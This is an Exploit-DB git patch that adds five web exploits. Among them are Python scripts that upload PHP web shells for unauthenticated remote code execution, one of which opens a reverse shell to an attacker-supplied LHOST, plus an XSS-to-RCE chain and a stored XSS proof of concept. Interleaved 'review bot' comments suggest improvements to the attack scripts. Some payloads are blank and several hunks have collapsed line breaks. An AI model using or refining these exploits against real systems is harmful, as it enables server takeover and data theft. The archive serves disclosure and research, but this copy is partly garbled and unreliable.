From 57766a2587409077260bf0d11908b715bdf68de4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 9 Jul 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-07-09

5 changes to exploits/shellcodes

Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)
Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)
Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
---
 exploits/multiple/webapps/50113.txt | 218 ++++++++++++++++++++++++++++
 exploits/php/webapps/50111.py | 61 ++++++++
 exploits/php/webapps/50112.txt | 25 ++++
 exploits/php/webapps/50114.py | 157 ++++++++++++++++++++
 exploits/php/webapps/50115.py | 139 ++++++++++++++++++
 files_exploits.csv | 5 +
 6 files changed, 605 insertions(+)
 create mode 100644 exploits/multiple/webapps/50113.txt
 create mode 100755 exploits/php/webapps/50111.py
 create mode 100644 exploits/php/webapps/50112.txt
 create mode 100755 exploits/php/webapps/50114.py
 create mode 100755 exploits/php/webapps/50115.py

diff --git a/exploits/multiple/webapps/50113.txt b/exploits/multiple/webapps/50113.txt
new file mode 100644
index 000000000..aa77bad3f
--- /dev/null
+++ b/exploits/multiple/webapps/50113.txt
@@ -0,0 +1,218 @@ +# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) +# Date: 2021-07-07 +# Exploit Author: Patrik Lantz +# Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html +# Version: <= 1.3.6 +# Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2 + + +The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution. + +A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. +The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable +the delivery of the XSS payload: + +POST /helpdesk/customer/ticket_save/ HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635 +Content-Length: 683 +Origin: https:// +Connection: close +Referer: https:///helpdesk/customer/ticket_view/ +Cookie: +Upgrade-Insecure-Requests: 1 + +-----------------------------243970849510445067673127196635 +Content-Disposition: form-data; name="form_key" + + +-----------------------------243970849510445067673127196635 +Content-Disposition: form-data; name="object" + +Hello +-----------------------------243970849510445067673127196635 +Content-Disposition: form-data; name="message_cc" + + +-----------------------------243970849510445067673127196635 +Content-Disposition: form-data; name="content" + +

+-----------------------------243970849510445067673127196635 +Content-Disposition: form-data; name="hideit" + + +-----------------------------243970849510445067673127196635-- + + + +The following XSS payload shown below can be used to trigger + +1) Enabling file attachments in ticket messages +2) Adding 'phar' to allowed file extensions +3) Setting the attachment directory to 'helpdesk/files/../../../pub' + + + + +After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting + +https://[HOSTNAME]///filename.phar + +ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the +URL, for example: + +https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/ + +and the messageId can be identified by hovering over the uploaded file link which will be similar to + +https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar + +in this case, the messageId is 40. \ No newline at end of file diff --git a/exploits/php/webapps/50111.py b/exploits/php/webapps/50111.py new file mode 100755 index 000000000..d46c20316 --- /dev/null +++ b/exploits/php/webapps/50111.py 
@@ -0,0 +1,61 @@ +# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) +# Exploit Author: Davide 'yth1n' Bianchin +# Contacts: davide dot bianchin at dedagroup dot it +# Original PoC: https://exploit-db.com/exploits/50103 +# Date: 06.07.2021 +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html +# Version: 1.0 +# Tested on: Kali Linux + +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder +import os +import sys +import string +import random +import time + +host = 'localhost' #CHANGETHIS +path = 'SourceCode' #CHANGETHIS + +url = 'http://'+host+'/'+path+'/pages/save_user.php' + +def id_generator(size=6, chars=string.ascii_lowercase): + return ''.join(random.choice(chars) for _ in range(size))+'.php' + +if len(sys.argv) == 1: + print("#########") + print("Usage: python3 examhallrce.py command") + print("Usage: Use the char + to concatenate commands") + print("Example: python3 examhallrce.py whoami") + print("Example: python3 examhallrce.py ls+-la") + print("#########") + exit() + + +filename = id_generator() +print("Generated "+filename+ " file..") +time.sleep(2) +print("Uploading file..") +time.sleep(2) + + + + +def reverse(): + command = sys.argv[1] + multipart_data = MultipartEncoder({ + 'image': (filename, '', 'application/octet-stream'), + 'btn_save': '' + }) + r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type}) + endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' + urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+'' + print("Success, file correctly uploaded at: " +endpoint+ "") + time.sleep(1) + print("Executing command in 1 seconds:\n") + time.sleep(1) + os.system("curl -X GET "+urlo+"") + +reverse() \ No newline at end of file 
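Review bot: `os.system("curl -X GET "+urlo+"")` at the end of `reverse()` builds a shell command by string concatenation from `sys.argv[1]`, so any shell metacharacter in the argument is interpreted by the local shell on the operator's own host; `requests` is already imported, so `print(requests.get(urlo).text)` performs the same fetch with no subprocess and no external `curl` dependency. The response `r` from `requests.post` is never inspected, so "Success, file correctly uploaded at:" is printed whether or not the upload request succeeded; either condition the message on `r.ok` or reword it to say only that the request was sent. `exit()` in the usage branch is the interactive-shell helper; `sys.exit()` is the form meant for scripts and `sys` is already imported.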
diff --git a/exploits/php/webapps/50112.txt b/exploits/php/webapps/50112.txt
new file mode 100644
index 000000000..e0a20f745
--- /dev/null
+++ b/exploits/php/webapps/50112.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
+# Date: 07 July 2021
+# Exploit Author: Subhadip Nag (mrl0s3r)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Tested on: Server: XAMPP
+
+# Description #
+
+Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data.
+
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/ERMSP/erms/loginerms.php
+2) Login: Login as a User(given username and password)
+3) Go To Edit My Education and Edit My Exp
+4) Enter the payload: 
+5) Click Update
+6) Go to 'My Education' option
+7) Our XSS attack successful
+
+# PoC image
+1) https://ibb.co/LS78xjX
+2) https://ibb.co/9G0Pbxb
\ No newline at end of file
diff --git a/exploits/php/webapps/50114.py b/exploits/php/webapps/50114.py
new file mode 100755
index 000000000..b257024cc
--- /dev/null
+++ b/exploits/php/webapps/50114.py
@@ -0,0 +1,157 @@ +# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated) +# Date: 2021-07-07 +# Exploit Author: faisalfs10x +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +""" +################ +# Description # +################ + +1. The admin panel UI login can be assessed at http://{ip}/scheduler/admin/login.php. Due to the client-side input validation implemented within scripts, it is possible to bypass and access the admin panel UI by making request to "http://localhost/scheduler/admin/?page=user" and removing the javascript tag '' in the server response body. +For making the process easier, we can use burp "Match and Replace" option to automatically replace the javascript tag parts of responses body passing through the proxy. +2. The admin panel has an upload function of profile photo accessible at http://localhost/scheduler/admin/?page=user. An attacker could upload a malicious file such as shell.php with the Content-Type: image/png. Then, the attacker have to visit the uploaded profile photo to access the shell. 
+ + +##################### +# PoC for webshell # +##################### + +Request: +======== + +POST /scheduler/classes/Users.php?f=save HTTP/1.1 +Host: localhost +Content-Length: 721 +sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" +Accept: */* +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/scheduler/admin/?page=user +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=a5d66tonur7vir28rtoc049127 +Connection: close + +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="id" + +1 +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="firstname" + +Adminstrator +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="lastname" + +Admin +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="username" + +admin +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="password" + + +------WebKitFormBoundaryYrg9YZykFY2bmNqY +Content-Disposition: form-data; name="img"; filename="rev.php" +Content-Type: image/png + + # shell content here +------WebKitFormBoundaryYrg9YZykFY2bmNqY-- + + +#################### +# Webshell access: # +#################### + +# Webshell access via: +PoC: http://localhost/scheduler/uploads/{random_number}_rev.php?rev=whoami + +# Output: +output: windows10/user + +""" + +################################################## +# Reverse shell exploit code for windows target: # +################################################## + +#!/usr/bin/python + +import requests +import sys +import string +import random +import urllib.request +from requests_html 
import HTMLSession + +if len(sys.argv) < 4: + print('\033[1;32;40m [+] Usage: python3 '+sys.argv[0]+' ') + exit() + +RHOST = sys.argv[1] +RPORT = '80' + +LHOST = sys.argv[2] +LPORT = sys.argv[3] + +if not RHOST.startswith('http://') and not RHOST.startswith('https://'): + RHOST = "http://" + RHOST + +# if not RHOST.endswith('/'): +# RHOST = RHOST + "/" + +# RHOST = '127.0.0.1' +# RPORT = '80' +# LHOST = '192.168.8.117' +# LPORT = '4444' + +shellpath = f"{RHOST}:{RPORT}/scheduler/uploads/" # shell will be uploaded here + +let = string.ascii_lowercase +shellfilename = ''.join(random.choice(let) for i in range(5))+".php" # or just static shellfilename = 'rev.php' + +req_url = f"{RHOST}:{RPORT}/scheduler/classes/Users.php?f=save" # endpoint for uploading shell + +req_headers = {"sec-ch-ua": "\"Chromium\";v=\"91\", \" Not;A Brand\";v=\"99\"", +"Accept": "*/*", +"X-Requested-With": "XMLHttpRequest", +"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", +"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY", +"Accept-Language": "en-US,en;q=0.9", +"Connection": "close"} + +req_data = "------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellfilename+"\"\r\nContent-Type: image/png\r\n\r\n\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY--\r\n" + +print("\033[1;33;40m Uploading 
shell...") +out = requests.post(req_url, headers=req_headers, data=req_data, verify=False) + +print("\033[1;31;40m Uploaded shell will be available at "+shellpath+"") +print(" Enjoy!") + +# finding the uploaded shell +session = HTMLSession() +r = session.get(shellpath) +sel = 'a[href*="'+shellfilename+'"]' +find_shellfilename = r.html.find(sel) + +# popping up the shell :p +for shellname in find_shellfilename: + try: + url = shellname.absolute_links.pop() + print("\033[1;33;40m Shell is available at "+url+"") + response = urllib.request.urlopen(url) + print(" Byeee!") + except KeyboardInterrupt: + exit('User aborted!') \ No newline at end of file diff --git a/exploits/php/webapps/50115.py b/exploits/php/webapps/50115.py new file mode 100755 index 000000000..8b21a9f32 --- /dev/null +++ b/exploits/php/webapps/50115.py 
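Review bot: The usage message `print('\033[1;32;40m [+] Usage: python3 '+sys.argv[0]+' ')` names none of the three positional arguments the script then reads as `RHOST`, `LHOST` and `LPORT` from `sys.argv[1..3]`, so a user who trips the `len(sys.argv) < 4` check learns only the script name; print `' <RHOST> <LHOST> <LPORT>'` after `sys.argv[0]` (the argument list may have been lost when this file was rendered, in which case the archived copy should be checked). The upload uses `requests.post(..., verify=False)` while the follow-up `urllib.request.urlopen(url)` keeps default certificate validation, so with an `https://` RHOST the two requests apply different TLS policies; pick one policy and apply it to both. `response` from `urlopen` is assigned but never read, so it can be dropped or the call made a bare statement.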
@@ -0,0 +1,139 @@ +# Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated) +# Date 07.07.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://smartypantsplugins.com/ +# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip +# Version: Before 4.22 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24347 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md + +''' +Description: +The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, +the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded +by checking the file extension. It was discovered that php files could still be uploaded by +changing the file extension's case, for example, from "php" to "pHP". +''' + + +''' +Banner: +''' +banner = """ + ______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____ + / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || ||___ /| || |___ | +| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / / +| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ / + \____| \_/ |_____| |_____|\___/_____|_| |_____| |_||____/ |_|/_/ + + * Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated) + * @Hacker5preme + +""" +print(banner) + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port 
= args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') +print('[*] Starting Exploit:') +print('') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +print('') +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print('[+] Authentication successfull !') +else: + print('[-] Authentication failed !') + exit() + + +''' +Retrieve User ID from the widget: +''' +user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text +search_string = "
\n \n \n \n \n\n\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\r\n\r\nUpload\r\n-----------------------------37032792112149247252673711332--\r\n" + +# Exploit: +session.post(exploit_url, headers=header, data=shell_payload) +print('') +print('[+] Exploit done !') +print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php') +print('') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9a73e9d3f..efcf9f0c4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
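Review bot: `auth_header = auth.headers['Set-Cookie']` raises `KeyError` when the login response carries no `Set-Cookie` header, so the `[-] Authentication failed !` branch below it is unreachable in exactly the case it is meant to report; `auth_header = auth.headers.get('Set-Cookie', '')` keeps the existing `in` test working, or test `session.cookies` directly. None of the `argparse` options is marked `required=True` or given a `help=` string, so an omitted flag surfaces as a `TypeError` on `'http://' + target_ip + ':' + target_port + ...` instead of a usage message. Part of this hunk, from `search_string = "` onward, is not legible in this copy, so the upload section of the file is not reviewed here.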
@@ -44248,3 +44248,8 @@ id,file,description,date,author,type,platform,port
 50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,
 50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",2021-07-07,faisalfs10x,webapps,php,
 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,
+50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",2021-07-08,"Davide \'yth1n\' Bianchin",webapps,php,
+50112,exploits/php/webapps/50112.txt,"Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)",2021-07-08,"Subhadip Nag",webapps,php,
+50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,
+50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",2021-07-08,faisalfs10x,webapps,php,
+50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php,